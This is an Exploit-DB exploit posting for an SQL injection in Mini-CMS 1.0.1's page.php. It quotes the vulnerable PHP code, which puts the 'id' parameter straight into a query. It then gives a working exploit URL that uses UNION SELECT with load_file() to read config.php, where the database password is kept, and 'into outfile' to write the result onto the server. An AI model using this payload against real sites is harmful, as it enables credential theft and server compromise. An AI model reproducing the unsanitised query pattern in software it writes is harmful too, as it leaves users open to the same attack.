Mini-CMS 1.0.1 - 'page.php' SQL Injection

EDB-ID:

9406

Author:

Ins3t

Type:

webapps

Platform:

PHP

Published:

2009-08-10

[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+]  
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Mini-CMS 1.0.1 SQL inlection
[+] Autor: Ins3t
[+] Site: www.arthacking.net
[+] Date:08.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the 
database, and in the config.php file.
[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php
[+] Code vulnerable functions:

[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]
<?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
          WHERE id = $id";                      <------(BUG)
$error = mysql_error();
if (!$result = mysql_query($query)) {
    print "$error";
        exit;
        }

while($row = mysql_fetch_object($result)){
  $content = $row->text;
  print("$content");
        }
?>
[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]

[+] Exploit: 

[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]

http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+

[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]

# milw0rm.com [2009-08-10]